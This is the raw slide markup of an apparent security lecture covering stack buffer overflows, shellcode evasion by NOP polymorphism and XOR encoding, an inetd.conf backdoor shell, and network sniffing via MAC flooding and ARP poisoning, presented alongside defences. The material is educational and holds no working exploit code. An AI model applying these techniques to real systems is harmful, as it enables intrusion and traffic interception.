          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="5029200"/>
            <a:ext cx="2362200" cy="6096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513" name="Google Shape;513;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="4419600"/>
            <a:ext cx="2362200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Google Shape;514;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3810000"/>
            <a:ext cx="23622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frame ptr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;515;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="3200400"/>
            <a:ext cx="2362200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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s,buffer[10]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="516" name="Google Shape;516;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2514600"/>
            <a:ext cx="0" cy="36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54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2438400"/>
            <a:ext cx="0" cy="36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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="32004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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441325" y="3165475"/>
            <a:ext cx="76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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="520" name="Google Shape;520;p54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5638800" y="29718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1" name="Google Shape;521;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5775325" y="4308475"/>
            <a:ext cx="222408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address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</a:t>
            </a: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2590800" y="3429000"/>
            <a:ext cx="2819400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54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1828800" y="41910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54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974725" y="4537075"/>
            <a:ext cx="16573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Overwritten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A’s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Stack Buffer Overflows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1" name="Google Shape;531;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="16764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overwrites return address to point somewhere else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“Local variables” portion of the stack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Places attack code in machine language at that portion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Since it is difficult to know exact address of the portion, pads attack code with NOPs before and after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Stack Buffer Overflows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8" name="Google Shape;538;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="131007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Intrusion Detection Systems (IDSs) could look for sequence of NOPs to spot buffer overflows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Attacker uses polymorphism: he transforms the code so that NOP is changed into some other command that does the same thing, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>e.g. MOV R1, R1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Attacker XORs important commands with a key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Attacker places XOR command and the key just before the encrypted attack code. XOR command is also obscured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Stack Buffer Overflows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5" name="Google Shape;545;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1383336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What type of commands does the attacker execute?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Commands that help him gain access to the machine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Writes a string into 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inetd.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t> file to start shell application listening on a port, then “logs on” through that port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Starts Xterm</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-3048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685800" y="3909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r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack Buffer Overflows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457200" y="1210008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How does an attacker discover Buffer overflow?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Looks at the source code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Runs application on his machine, tries to supply long inputs and looks at system registers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Read more at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http://insecure.org/stf/smashstack.html</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="553" name="Google Shape;5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40" y="4169083"/>
            <a:ext cx="8313560" cy="244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Defenses: Stack Overflows</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Google Shape;560;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1340835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For system administrators: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Apply patches, keep systems up-to-date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Disable execution from the stack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Monitor writes on the stack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Store return address somewhere else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Monitor outgoing traffic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For software designers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Apply checks for buffer overflows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Use safe functions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Static and dynamic code analysis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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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Network Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1625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Sniffing for passwords and usernames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Spoofing addresses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Hijacking a session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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="635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On a Hub</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Google Shape;574;p61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Looking at raw packet information</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p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Ethernet is a broadcast media – every machine connected to it can hear all the information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Passive sniffing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Google Shape;575;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9906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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="3048000"/>
            <a:ext cx="381000" cy="3810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61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54102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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="48006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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3898900"/>
            <a:ext cx="381000" cy="3810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61"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="575" idx="6"/>
            <a:endCxn id="579" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="40894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61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="38862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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041525" y="3519488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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="2971800"/>
            <a:ext cx="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61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4876800" y="3276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61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4876800" y="4114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61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4876800" y="4978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61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3835400" y="38862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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3863975" y="3519488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sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;590;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="48006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91" name="Google Shape;591;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843588" y="30353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2" name="Google Shape;592;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429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593" name="Google Shape;593;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="42672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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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On a Hub</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Google Shape;600;p62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can get anything that is not encrypted and is sent to LAN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Defense: encrypt all sensitive traffic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Tcpdump</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1360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GB">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.tcpdump.org</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="9794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Snort</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1360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GB">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.snort.org</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="1" marL="9794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Ethereal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1360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GB">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.ethereal.com</a:t>
            </a:r>
            <a:endParaRPr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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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On a Switch</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Google Shape;607;p63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Switch is connected by a separate physical line to every machine and it chooses only one line to send the message</a:t>
            </a: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9906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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="3048000"/>
            <a:ext cx="381000" cy="3810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63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54102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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="48006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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3898900"/>
            <a:ext cx="381000" cy="3810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Google Shape;613;p63"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="608" idx="6"/>
            <a:endCxn id="612" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="40894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63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="38862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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041525" y="3519488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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="616" name="Google Shape;616;p63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3810000" y="3276600"/>
            <a:ext cx="1600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63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="4343400" y="4267200"/>
            <a:ext cx="457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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1700981">
            <a:off x="4013200" y="4708525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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="619" name="Google Shape;619;p63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="48006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622" name="Google Shape;622;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843588" y="30353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23" name="Google Shape;623;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429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24" name="Google Shape;624;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="42672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096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Low Tech Reconnaissance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Social engineering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Instruct the employees not to divulge sensitive information on the phone or email</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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Physical break-in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Insist on using badges for access, everyone must have a badge, lock sensitive equipment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How about wireless access?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Dumpster diving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Shred important documents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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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On a Switch – Take 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631;p64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sends a lot of ARP messages for fake addresses to R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Some switches send on all interfaces when their table overloads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9906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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="3048000"/>
            <a:ext cx="381000" cy="3810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64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54102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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="48006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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3898900"/>
            <a:ext cx="381000" cy="3810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64"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="632" idx="6"/>
            <a:endCxn id="636" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="40894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64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="38862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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041525" y="3519488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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="640" name="Google Shape;640;p64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3810000" y="3276600"/>
            <a:ext cx="1600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64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="4343400" y="4267200"/>
            <a:ext cx="457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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1700981">
            <a:off x="4013200" y="4708525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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="643" name="Google Shape;643;p64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="48006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646" name="Google Shape;646;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843588" y="30353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47" name="Google Shape;647;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429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48" name="Google Shape;648;p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="42672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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="649" name="Google Shape;649;p64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4323556" y="3050914"/>
            <a:ext cx="496888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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1625569">
            <a:off x="4057927" y="3150489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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="651" name="Google Shape;651;p64"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4275662" y="4025370"/>
            <a:ext cx="9228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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4552419" y="3658658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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr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On a Switch – Take 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="Google Shape;659;p65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Address Resolution Protocol (ARP) maps IP addresses with MAC addresses</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Google Shape;660;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9906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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="3048000"/>
            <a:ext cx="381000" cy="3810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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="54102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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="48006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65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3898900"/>
            <a:ext cx="381000" cy="3810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65"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="660" idx="6"/>
            <a:endCxn id="664" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="40894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65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="38862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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041525" y="3519488"/>
            <a:ext cx="1038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For X</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3810000" y="3276600"/>
            <a:ext cx="1600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65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="4343400" y="4724400"/>
            <a:ext cx="457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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1700981">
            <a:off x="3997325" y="5226050"/>
            <a:ext cx="1038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For X</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="671" name="Google Shape;671;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="41148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65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3962400" y="34290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65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="40386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65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4191000" y="41910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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="2971800"/>
            <a:ext cx="1693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Who has X?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="677" name="Google Shape;677;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4495800" y="45720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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1700981">
            <a:off x="4318000" y="4721225"/>
            <a:ext cx="839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 do</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p65"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="3352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5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="3352800"/>
            <a:ext cx="533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5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="3352800"/>
            <a:ext cx="685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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="48006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683" name="Google Shape;683;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843588" y="30353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84" name="Google Shape;684;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429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85" name="Google Shape;685;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="42672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"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="105829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On a Switch – Take 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Google Shape;692;p66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uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP poisoning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800"/>
              <a:t>to map his MAC address to IP address X</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9906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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="2552700"/>
            <a:ext cx="381000" cy="3810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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="38989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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5410200" y="48006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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="3898900"/>
            <a:ext cx="381000" cy="3810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8" name="Google Shape;698;p66"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="693" idx="6"/>
